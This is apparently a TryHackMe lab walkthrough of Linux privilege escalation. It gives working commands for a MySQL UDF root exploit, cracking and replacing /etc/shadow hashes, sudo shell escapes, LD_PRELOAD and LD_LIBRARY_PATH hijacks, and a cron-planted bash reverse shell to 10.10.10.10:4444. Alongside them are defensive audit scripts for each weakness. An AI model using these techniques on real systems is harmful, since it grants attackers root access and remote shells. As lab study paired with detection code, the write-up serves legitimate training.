Day 1 — Linux PrivEsc
Today is my Day 1 and I am going to solve the machine named Linux PrivEsc on TryHackMe, let's go!!!!
Service Exploits
Enumerate the running services using nmap.

Compile the raptor_udf2.c UDF from /home/user/tools/mysql-udf into a shared object:
cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
I found a misconfiguration in the SQL login: it works without a password.
A user-defined function (UDF) is a function provided by the user of a program or environment, in a context where the usual assumption is that functions are built into the program or environment. UDFs are usually written to meet the requirements of their creator.
Log in to MySQL as root (no password needed) and load the compiled shared object into the plugin directory through a table:
mysql -u root

use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
What is BLOB in MySQL?
BLOB, which stands for a Binary Large Object, is a MySQL data type that can store images, PDF files, multimedia, and other types of binary data.

Use the function to copy /bin/bash to /tmp/rootbash and set the SUID permission:
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
/tmp/rootbash -p
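The UDF trick above needs three things at once: a MySQL login that works without a password, a server that can write into its own plugin directory with INTO DUMPFILE, and a server process running as root so the UDF's commands run as root. As an added example (my own code, not part of the TryHackMe room or this walkthrough), the following audits a my.cnf-style [mysqld] section for those conditions. The option names (user, plugin_dir, secure_file_priv, skip_grant_tables) are real mysqld options; the sample configs are constructed, the function names are mine, and the fallback plugin directory /usr/lib/mysql/plugin is assumed from the path used in the walkthrough.

```python
# Added example (not from the TryHackMe room or the walkthrough): audit a
# my.cnf-style [mysqld] section for the settings that make the UDF trick possible.
# Option names are real mysqld options; the sample configs below are constructed.


def parse_mycnf(text):
    """Parse INI-style MySQL config text into {section: {option: value}}.

    Option names are normalised the way mysqld treats them: case-insensitive,
    with '-' and '_' interchangeable. Options without '=' get an empty value.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        sections[current][key] = value.strip().strip("\"'")
    return sections


def _inside(path, parent):
    """True if path equals parent or lies below it."""
    path, parent = path.rstrip("/"), parent.rstrip("/")
    return path == parent or path.startswith(parent + "/")


def audit_mysqld(text, default_plugin_dir="/usr/lib/mysql/plugin"):
    """Return a list of findings for the [mysqld] section of config text.

    default_plugin_dir is the directory the walkthrough writes into; it is
    assumed here as the fallback when plugin_dir is not set explicitly.
    """
    cfg = parse_mycnf(text).get("mysqld", {})
    findings = []
    if cfg.get("user") == "root":
        findings.append("user=root: any UDF loaded into the server executes as root")
    if "skip_grant_tables" in cfg:
        findings.append("skip_grant_tables: privilege checks are disabled, every client is root")
    plugin_dir = cfg.get("plugin_dir") or default_plugin_dir
    sfp = cfg.get("secure_file_priv")
    if not sfp:
        findings.append(
            "secure_file_priv is unset or empty in this file: LOAD_FILE() and "
            "SELECT ... INTO DUMPFILE can reach any path the server process can "
            "(confirm the live value with SHOW VARIABLES)"
        )
    elif sfp.upper() != "NULL" and _inside(plugin_dir, sfp):
        findings.append(
            "plugin_dir %s lies inside secure_file_priv %s, so INTO DUMPFILE can "
            "still drop a shared object there" % (plugin_dir, sfp)
        )
    return findings


# Constructed sample configs: the weak one mirrors the conditions the room exploits.
WEAK_CONFIG = """
[mysqld]
user = root
plugin-dir = /usr/lib/mysql/plugin
"""

HARDENED_CONFIG = """
[mysqld]
user = mysql
plugin_dir = /usr/lib/mysql/plugin
secure_file_priv = /var/lib/mysql-files
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_mysqld(cfg) or ["no findings"])
```

Running it prints two findings for the weak config (root service user, unrestricted file access) and none for the hardened one. The secure_file_priv check is deliberately conservative: a missing option in the file does not prove the running value is empty, which is why the finding tells you to confirm with SHOW VARIABLES.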

Weak File Permissions - Readable /etc/shadow
The shadow file is readable by others (the r bit is set for "other"):
ll /etc/shadow
cat /etc/shadow
# copy the root user's hash into hash.txt (e.g. with nano)
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

What hashing algorithm was used to produce the root user's password hash?
cat hash.txt | hashid

Weak File Permissions - Writable /etc/shadow
The shadow file is writable by others (the w bit is set for "other"):
ll /etc/shadow
cat /etc/shadow
Generate a new password hash with a password of your choice:
mkpasswd -m sha-512 newpasswordhere
or
openssl passwd newpasswordhere
Put the new hash in the root entry of /etc/shadow, then switch user:
su root
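Both shadow tasks come down to the same two questions a defender should be asking about /etc/shadow: who can read or write it, and what algorithm protects each hash (the hashid question from the readable task). As an added example (my own code, not from the TryHackMe room or this walkthrough), the script below checks the mode and owner of a shadow-format file and classifies every entry by its crypt(3) identifier, flagging empty password fields and weak algorithms. It runs against a constructed sample file with placeholder hash bodies; the function names are mine, and pointing audit_shadow at the real /etc/shadow requires root.

```python
# Added example (not from the TryHackMe room or the walkthrough): audit a
# shadow-format file for weak permissions and weak hash algorithms.
import os
import stat
import tempfile

# crypt(3) hash identifiers found in the second field of /etc/shadow
HASH_IDS = {
    "1": "md5crypt",
    "2a": "bcrypt",
    "2b": "bcrypt",
    "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "7": "scrypt",
    "y": "yescrypt",
}
WEAK_ALGORITHMS = {"md5crypt", "DES-crypt"}


def identify_hash(field):
    """Classify one shadow password field: returns (algorithm, note)."""
    if field == "":
        return "none", "empty password field, login needs no password"
    if field[0] in "!*":
        return "locked", ""
    if field.startswith("$"):
        parts = field.split("$")  # "$6$salt$hash" -> ["", "6", "salt", "hash"]
        if len(parts) > 1 and parts[1] in HASH_IDS:
            return HASH_IDS[parts[1]], ""
        return "unknown", "unrecognised hash identifier %r" % field[:4]
    return "DES-crypt", "legacy 13-character DES hash"


def audit_shadow(path):
    """Check mode and owner of a shadow-format file and classify every entry.

    Returns ({user: algorithm}, [finding, ...]).
    """
    findings = []
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    if mode & stat.S_IROTH:
        findings.append("%s is world-readable (mode %04o): hashes can be taken offline and cracked" % (path, mode))
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("%s is writable by group or others (mode %04o): any hash can be replaced" % (path, mode))
    if st.st_uid != 0:
        findings.append("%s is not owned by root (uid %d)" % (path, st.st_uid))

    algorithms = {}
    with open(path) as fh:
        for line in fh:
            fields = line.rstrip("\n").split(":")
            if len(fields) < 2:
                continue
            user = fields[0]
            algo, note = identify_hash(fields[1])
            algorithms[user] = algo
            if note:
                findings.append("%s: %s" % (user, note))
            if algo in WEAK_ALGORITHMS:
                findings.append("%s: weak hash algorithm %s, re-hash with sha512crypt or yescrypt" % (user, algo))
    return algorithms, findings


# Constructed sample: the hash bodies are placeholders, not real hashes.
SAMPLE_SHADOW = (
    "root:$6$saltsalt$PLACEHOLDERsha512:19000:0:99999:7:::\n"
    "daemon:*:19000:0:99999:7:::\n"
    "legacy:$1$saltsalt$PLACEHOLDERmd5:19000:0:99999:7:::\n"
    "guest::19000:0:99999:7:::\n"
)


def write_sample(mode=0o644):
    """Write the sample to a temp file with the given mode and return its path."""
    fd, path = tempfile.mkstemp(prefix="shadow-sample-")
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_SHADOW)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for mode in (0o644, 0o640):
        algorithms, findings = audit_shadow(write_sample(mode))
        print("mode %04o:" % mode, algorithms)
        for finding in findings:
            print("  -", finding)
```

With the sample at mode 0644 the output reports the world-readable file, the empty guest password and the md5crypt hash on the legacy account; at 0640 (the normal root:shadow setting) only the entry findings remain. The root entry classifies as sha512crypt, which is what the $6$ prefix means and what hashid reports for it.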
Sudo - Shell Escape Sequences
Visit GTFOBins (https://gtfobins.github.io) and search for some of the program names. If the program is listed with “sudo” as a function, you can use it to elevate privileges, usually via an escape sequence.
#vim
sudo vim -c ':!/bin/bash'
#nano
sudo nano -s /bin/bash
/bin/bash
^T
#apache2
sudo apache2 -f /etc/shadow # apache2 rejects the "config" file and echoes its first line in the syntax error, leaking root's hash; crack it to gain root
Sudo - Environment Variables
Using LD_PRELOAD
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so apache2
Using LD_LIBRARY_PATH (ldd lists the shared libraries apache2 loads; libcrypt.so.1 is the one replaced here)
ldd /usr/sbin/apache2
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2
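Both sudo sections depend on how sudoers is written: the shell escapes need a rule that grants an editor or similar program, and the LD_PRELOAD / LD_LIBRARY_PATH tricks only work because sudo's default env_reset has been weakened with an env_keep entry for those variables (stock sudo strips them). As an added example (my own code, not from the TryHackMe room or this walkthrough), the following parses sudoers-format text and reports exactly those conditions. The escape-program set contains only the three programs named on this page and should be extended from GTFOBins for a real audit; the sample sudoers text is constructed and the function names are mine.

```python
# Added example (not from the TryHackMe room or the walkthrough): audit
# sudoers-format text for loader-variable env_keep entries and shell-escape rules.
import os.path
import re

# Programs the walkthrough names as having sudo shell escapes; extend this set
# from GTFOBins for a real audit.
ESCAPE_PROGRAMS = {"vim", "nano", "apache2"}
# Environment variables that change what a sudo-run binary loads.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}

# user  host=(runas) [TAG:] command, command ...
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def audit_sudoers(text, escape_programs=ESCAPE_PROGRAMS):
    """Return findings for sudoers-format text (comments and blank lines ignored)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("Defaults"):
            if "!env_reset" in line:
                findings.append("Defaults: env_reset is disabled, the caller's environment reaches the command")
            if "env_keep" in line:
                kept = set(re.findall(r"[A-Z_][A-Z0-9_]*", line.split("=", 1)[1]))
                for var in sorted(kept & LOADER_VARS):
                    findings.append(
                        "Defaults: env_keep preserves %s, so a caller can make any "
                        "allowed sudo command load their own library" % var
                    )
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        tags = set()  # tags such as NOPASSWD: apply to the commands that follow them
        for item in m.group("cmds").split(","):
            tokens = item.split()
            while tokens and tokens[0].endswith(":") and tokens[0][:-1].isupper():
                tags.add(tokens.pop(0)[:-1])
            if not tokens:
                continue
            cmd = tokens[0]
            label = "%s -> %s%s" % (user, cmd, " (NOPASSWD)" if "NOPASSWD" in tags else "")
            if cmd == "ALL" and user != "root":
                findings.append(label + ": unrestricted")
            elif os.path.basename(cmd) in escape_programs:
                findings.append(label + ": program with a known shell escape")
            if "SETENV" in tags:
                findings.append(label + ": SETENV lets the caller override environment variables")
    return findings


# Constructed sample, not a real sudoers file.
SAMPLE_SUDOERS = """
Defaults        env_reset
Defaults        env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
root    ALL=(ALL:ALL) ALL
user    ALL=(root) NOPASSWD: /usr/bin/vim, /usr/sbin/apache2
user    ALL=(root) /usr/bin/nano
user    ALL=(root) SETENV: /usr/bin/id
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print("-", finding)
```

On the sample this yields six findings: the two env_keep entries, the three escape-capable programs (two of them NOPASSWD) and the SETENV tag. Removing the env_keep line and replacing the editor rules with a narrowly scoped command brings the output down to nothing, which is the state you want for the "user" account.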
Cron Jobs - File Permissions
cat /etc/crontab
Overwrite the writable script that the cron job runs with a reverse shell:
#!/bin/bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
Listen for the connection using nc on Kali:
nc -nvlp 4444
Cron Jobs - PATH Environment Variable
cat /etc/crontab
Note that the PATH variable starts with /home/user, which is our user's home directory.
Create a file called overwrite.sh in your home directory with the following contents:
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
Make the script executable, wait for the cron job to run, then use the SUID copy of bash:
chmod +x /home/user/overwrite.sh
/tmp/rootbash -p
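The two cron tasks are the same class of bug seen from two sides: a job that runs a script an unprivileged user can write, and a job that runs a bare program name while PATH begins with a directory an unprivileged user controls. As an added example covering both (my own code, not from the TryHackMe room or this walkthrough), the following parses /etc/crontab-format text, checks each PATH entry and each job's program on the filesystem, and reports the writable ones. It builds a constructed directory layout in a temp dir (a world-writable "home" directory standing in for /home/user) rather than touching the real crontab; the function names are mine, and trusted_uids is a parameter I introduced so the check can be run as a non-root user.

```python
# Added example (not from the TryHackMe room or the walkthrough): audit
# /etc/crontab-format text for writable PATH entries and writable job scripts.
import os
import stat
import tempfile

TIME_FIELDS = 5  # minute hour day-of-month month day-of-week; /etc/crontab adds a user field


def writable_by_untrusted(path, trusted_uids):
    """True if path exists and is owned by an untrusted uid or is group/world writable."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return st.st_uid not in trusted_uids or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text, trusted_uids=frozenset({0})):
    """Audit /etc/crontab-format text. @reboot-style shortcuts are skipped."""
    findings = []
    path_dirs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # variable assignment (PATH=..., SHELL=...) rather than a job line
        if "=" in line and line[0] not in "*@0123456789":
            name, value = (part.strip() for part in line.split("=", 1))
            if name == "PATH":
                path_dirs = value.strip("\"'").split(":")
                for d in path_dirs:
                    if not os.path.isabs(d):
                        findings.append("PATH entry %r is relative" % d)
                    elif writable_by_untrusted(d, trusted_uids):
                        findings.append("PATH entry %s is writable by an untrusted user" % d)
            continue
        fields = line.split(None, TIME_FIELDS + 1)
        if len(fields) < TIME_FIELDS + 2:
            continue
        user, command = fields[TIME_FIELDS], fields[TIME_FIELDS + 1]
        prog = command.split()[0]
        if "/" in prog:
            if writable_by_untrusted(prog, trusted_uids):
                findings.append("job as %s runs %s, which is writable by an untrusted user" % (user, prog))
            continue
        # bare program name: cron searches PATH in order, so a writable directory
        # ahead of the real location wins
        for d in path_dirs:
            if writable_by_untrusted(d, trusted_uids):
                findings.append("job as %s runs %r via PATH and %s is searched first, which is writable" % (user, prog, d))
                break
            if os.path.exists(os.path.join(d, prog)):
                break
    return findings


def build_sample():
    """Create a constructed layout and crontab text mirroring the room's two bugs.

    Returns (crontab_text, base_dir). 'home' stands in for /home/user.
    """
    base = tempfile.mkdtemp(prefix="cron-audit-")
    home = os.path.join(base, "home")
    bin_dir = os.path.join(base, "bin")
    scripts = os.path.join(base, "scripts")
    for d, mode in ((home, 0o777), (bin_dir, 0o755), (scripts, 0o755)):
        os.mkdir(d)
        os.chmod(d, mode)
    for path, mode in ((os.path.join(bin_dir, "overwrite.sh"), 0o755),
                       (os.path.join(scripts, "backup.sh"), 0o666),
                       (os.path.join(scripts, "rotate.sh"), 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\ntrue\n")
        os.chmod(path, mode)
    text = (
        "SHELL=/bin/sh\n"
        "PATH=%s:%s\n"
        "* * * * * root overwrite.sh\n"
        "* * * * * root %s/backup.sh\n"
        "* * * * * root %s/rotate.sh\n"
    ) % (home, bin_dir, scripts, scripts)
    return text, base


if __name__ == "__main__":
    text, _ = build_sample()
    for finding in audit_crontab(text, trusted_uids={0, os.getuid()}):
        print("-", finding)
```

On the sample this reports three problems: the writable first PATH entry, the overwrite.sh job that is resolved through that entry, and the group/world-writable backup.sh; rotate.sh at 0755 is not reported. The fix on a real host is the one implied by the room: absolute paths in job lines, a PATH of root-owned directories only, and 0755 root-owned scripts.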